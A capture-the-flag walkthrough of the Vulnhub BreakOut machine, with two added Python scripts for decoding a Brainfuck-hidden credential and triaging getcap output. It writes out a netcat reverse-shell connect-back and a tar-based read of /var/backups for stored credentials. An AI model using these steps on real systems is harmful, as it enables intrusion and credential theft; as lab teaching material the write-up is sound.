Vulnhub BreakOut — A Detailed Walkthrough.


Enumeration

As you might have guessed, the first thing I did was scan the box with nmap to see which ports are open and what services are running on them.

┌──(kali㉿kali)-[~]
└─$ nmap -p- -A -T4 192.168.118.147
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-28 10:46 EDT
Nmap scan report for 192.168.118.147
Host is up (0.00071s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-05-28T14:46:42
|_ start_date: N/A
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.36 seconds
Viewing the source of the default Apache page on port 80 shows a hidden HTML comment:

<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.-->

The second line of the comment is not encryption at all. The characters + - < > [ ] . are exactly the instruction set of the Brainfuck esoteric language, so running the blob through any Brainfuck interpreter prints the credential the comment refers to. Paired with the username that the SMB enumeration below turns up, that is the login for the next step.
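The walkthrough does not show the decoding step, so here is a small Brainfuck interpreter, added to this page and not part of the original post, that runs the blob. The function names and the looks_like_brainfuck triage helper are mine; the blob itself is transcribed from the comment above with its long runs written as counts so each run can be checked against the page. The interpreter is general (it handles input and nested loops), so it decodes any similar blob, not only this one.

```python
# Added example (not from the original walkthrough): a small, general
# Brainfuck interpreter used to decode the blob in the hidden HTML comment.
# Brainfuck has eight instructions: > < + - . , [ ]  Everything else is a
# comment. The blob uses seven of them (no ','), so it needs no input.
from typing import Dict, List


def looks_like_brainfuck(text: str) -> bool:
    """Cheap triage for an unknown blob: only Brainfuck symbols (plus whitespace),
    at least one output instruction, and balanced brackets."""
    stripped = "".join(text.split())
    if not stripped or set(stripped) - set("><+-.,[]"):
        return False
    depth = 0
    for ch in stripped:
        if ch == "[":
            depth += 1
        elif ch == "]":
            depth -= 1
            if depth < 0:
                return False
    return depth == 0 and "." in stripped


def run_brainfuck(program: str, stdin: bytes = b"", tape_size: int = 30000) -> str:
    """Execute `program` and return everything it prints, decoded as Latin-1 so
    every byte value 0-255 maps to exactly one character."""
    # Pre-compute matching brackets so loops are O(1) jumps and an unbalanced
    # program fails before it runs.
    jump: Dict[int, int] = {}
    stack: List[int] = []
    for pos, ch in enumerate(program):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {pos}")
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = bytearray(tape_size)   # 8-bit cells that wrap, as in the reference implementation
    ptr = pc = 0
    inp = iter(stdin)             # iterating bytes yields ints
    out = bytearray()
    while pc < len(program):
        ch = program[pc]
        if ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer moved below cell 0")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = next(inp, 0)      # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]                 # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]                 # back to the matching '['
        pc += 1
    return out.decode("latin-1")


# The blob from the comment, transcribed with the long runs written as counts
# so each run can be checked against the page. After the setup loop the tape
# holds 0, 10, 30, 70, 100 in cells 0-4; every later run nudges one of those
# cells to the byte it then prints.
HIDDEN_BLOB = (
    "+" * 10 + "[>+>+++>" + "+" * 7 + ">" + "+" * 10 + "<<<<-]"   # cells 1-4 = 10, 30, 70, 100
    + ">>" + "+" * 16 + "." + "+" * 4 + "."                        # cell 2: 46, 50
    + ">>" + "+" * 17 + "." + "-" * 4 + "."                        # cell 4: 117, 113
    + "<" + "+" * 10 + "." + "-" * 11 + "."                        # cell 3: 80, 69
    + ">" + "-" * 11 + "." + "+" * 4 + "."                         # cell 4: 102, 106
    + "<<+." + ">-." + "-" * 8 + "." + "+" * 20 + "."              # cell 2: 51; cell 3: 68, 60, 80
    + "<" + "-" * 12 + "."                                         # cell 2: 39
    + ">>" + "-" * 9 + "."                                         # cell 4: 97
    + "<<" + "+" * 6 + "." + "+" * 6 + "."                         # cell 2: 45, 51
    + "--"                                                         # trailing, prints nothing
)


def decode_hidden_comment() -> str:
    """Decode the blob; the result is the password the walkthrough goes on to use."""
    if not looks_like_brainfuck(HIDDEN_BLOB):
        raise ValueError("blob does not look like Brainfuck")
    return run_brainfuck(HIDDEN_BLOB)


if __name__ == "__main__":
    print(decode_hidden_comment())
```

Run it and the 16-character credential appears on stdout. Because the cells are 8-bit and wrap, the same interpreter also handles blobs that rely on underflow tricks, which a naive "increment an int" version would get wrong.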
enum4linux scan results

Exploitation

As expected, the credentials worked on the Usermin login page on port 20000. (nmap labels both 10000 and 20000 as Webmin because both run the MiniServ web server; 10000 is Webmin's default port and 20000 is Usermin's.) Usermin is the per-user counterpart of Webmin: it lets a user manage their own account and applications through a browser, and one of its features is a command shell that runs commands as the logged-in user. That is enough to read the user flag.

user flag

Privilege Escalation

Now that we have an initial foothold on the machine, let's enumerate further to see how we can escalate our privileges and gain root access.

First start a listener on the Kali machine, then connect back to it from the Usermin command shell on the box:

nc -nvlp 4444      (run this on the Kali machine)
nc 192.168.118.146 4444      (run this on the box)

On its own, nc on the box only opens a raw TCP connection back to Kali; to get a shell over it, the box's nc has to be told to execute bash (the -e option, where the build supports it) or a shell has to be wired to the connection through a named pipe. Once the listener catches the connection we have an interactive shell as the cyber user, which is far more convenient than the one-command-at-a-time web form.
Reverse bash shell

Looking around the file system, there is a second copy of tar in cyber's home directory. A copy of a standard tool sitting outside /bin or /usr/bin deserves attention: compare it with /bin/tar and check its file capabilities with getcap, because a tar that can read what our user otherwise cannot turns "archive it, then extract the archive somewhere we control" into an arbitrary file read. Used on /var/backups:

cd /tmp
/home/cyber/tar -cvf backups_archive.tar /var/backups
/home/cyber/tar -xvf backups_archive.tar

GNU tar strips the leading / from member names, so the extraction lands under /tmp/var/backups. Backup directories are a classic place for old credential files, and tar preserves dotfiles, so list the extracted tree with ls -la rather than plain ls before deciding there is nothing there.
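A second tar binary in a home directory is exactly the kind of thing a file-capability sweep surfaces, and the walkthrough does not show how that sweep is done. As an added example, not from the original post, here is a Python triage of getcap -r / 2>/dev/null output run over constructed sample lines. Both getcap output layouts (older "path = caps+ep" and newer "path caps=ep") are handled. The paths and capabilities in the sample, the DANGEROUS_CAPS table and the function names are mine; the sample is made up for illustration and is not a description of what the Breakout box has.

```python
# Added example (not from the original walkthrough): triage of `getcap -r /`
# output after a foothold. A binary carrying file capabilities runs with those
# privileges for whoever can execute it, so an unusual binary with a dangerous
# capability is a privilege-escalation candidate. The sample output below is
# constructed for illustration; it is NOT a description of the Breakout box.
import re
import subprocess
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# Capabilities that turn an ordinary program into a file-read or root primitive.
DANGEROUS_CAPS = {
    "cap_dac_read_search": "ignores read/search permission checks: can archive or copy any file",
    "cap_dac_override": "ignores read/write/execute permission checks on files",
    "cap_setuid": "can change to uid 0",
    "cap_setgid": "can change to any group",
    "cap_chown": "can take ownership of any file",
    "cap_fowner": "bypasses owner checks (chmod, utime, ...)",
    "cap_sys_ptrace": "can attach to and inject into processes running as root",
    "cap_sys_admin": "mount, namespaces and much more: effectively root",
    "cap_sys_module": "can load kernel modules",
}

# Where capability-bearing binaries normally live on a Debian system.
EXPECTED_DIRS = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/", "/bin/", "/sbin/")

# getcap has printed two layouts over the years:
#   /usr/bin/ping = cap_net_raw+ep     (older libcap)
#   /usr/bin/ping cap_net_raw=ep       (libcap 2.4x and newer)
GETCAP_LINE = re.compile(r"^(?P<path>\S+)\s*(?:=\s*)?(?P<caps>[a-z0-9_,]+)(?P<flags>[+=][eip]+)$")


@dataclass(frozen=True)
class Finding:
    path: str
    caps: Tuple[str, ...]
    flags: str
    reasons: Tuple[str, ...]


def parse_getcap(output: str) -> Iterator[Tuple[str, Tuple[str, ...], str]]:
    """Yield (path, capabilities, flags) for every well-formed getcap line."""
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = GETCAP_LINE.match(line)
        if m is None:
            continue  # error text such as "Failed to get capabilities of file ..."
        caps = tuple(c for c in m.group("caps").split(",") if c)
        yield m.group("path"), caps, m.group("flags")


def triage_getcap(output: str) -> List[Finding]:
    """Return the binaries worth a second look, most dangerous first."""
    findings: List[Finding] = []
    for path, caps, flags in parse_getcap(output):
        reasons = [f"{c}: {DANGEROUS_CAPS[c]}" for c in caps if c in DANGEROUS_CAPS]
        if not path.startswith(EXPECTED_DIRS):
            reasons.append("binary outside the usual system directories")
        if reasons and "e" not in flags:
            # Permitted but not effective: the program must raise the capability
            # itself (capset) before it is usable, which most programs never do.
            reasons.append("capability is permitted but not effective; check whether the program raises it")
        if reasons:
            findings.append(Finding(path, caps, flags, tuple(reasons)))
    # Dangerous-capability hits before location-only hits, then by path.
    findings.sort(key=lambda f: (-sum(c in DANGEROUS_CAPS for c in f.caps), f.path))
    return findings


# Constructed sample output: harmless Debian defaults plus two planted hits
# and one of the error lines getcap emits for unreadable entries.
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/python3.9 cap_setuid=ep
/opt/backup/tar cap_dac_read_search=ep
Failed to get capabilities of file '/proc/1/exe' (Operation not permitted)
"""


def triage_live_system() -> List[Finding]:
    """Run getcap on the current host and triage it (needs libcap's getcap installed)."""
    proc = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True, check=False)
    return triage_getcap(proc.stdout)


if __name__ == "__main__":
    for f in triage_getcap(SAMPLE_GETCAP_OUTPUT):
        print(f"{f.path}  {','.join(f.caps)}{f.flags}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a real box call triage_live_system() instead of the sample; getcap prints its permission errors on stderr, so the parser only ever sees stdout there, but it tolerates error text anyway in case the two streams were captured together.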

Conclusion

Thorough enumeration is the key to finding and exploiting vulnerabilities; exploitation becomes easy once you have gathered enough information about the target. Look inside page source, and do not skip web directory enumeration (I did it here too, but it turned up nothing interesting, so I left it out to keep the writeup short). Once you have an initial foothold, enumeration is the key again for privilege escalation: look inside all the files and directories you can reach.

References

  1. Vulnhub BreakOut — https://www.vulnhub.com/entry/empire-breakout,751/
  2. Awesome article on TAR — https://www.lifewire.com/tar-file-2622386
  3. Awesome article on SMB enumeration — https://null-byte.wonderhowto.com/how-to/enumerate-smb-with-enum4linux-smbclient-0198049/

Yashwardhan Chavan
